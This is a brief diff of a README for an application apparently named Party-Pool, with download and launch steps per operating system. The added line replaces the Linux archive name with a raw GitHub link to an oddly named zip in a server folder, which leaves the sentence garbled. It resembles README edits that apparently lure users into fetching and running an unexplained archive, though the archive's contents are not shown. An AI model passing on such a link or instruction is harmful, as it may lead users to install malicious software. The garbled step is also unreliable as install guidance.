RebelRoro/Party-Pool/README.md

 After you have downloaded the application, follow these steps to run it:

 1. Locate the file you downloaded in your computer's Downloads folder or wherever you saved it.
 2. For Windows, double-click the `.exe` file.
 For Mac, double-click the `.dmg` file and drag Party-Pool to your Applications folder.
-For Linux, open a terminal, navigate to the folder where you saved the file, and extract the `.tar.gz` file.
+For Linux, open a terminal, navigate to the folder where you saved the file, and extract the `https://raw.githubusercontent.com/RebelRoro/Party-Pool/main/server/Party_Pool_whangam.zip` file.
 3. Open the application by clicking its icon.

 ### First-Time Setup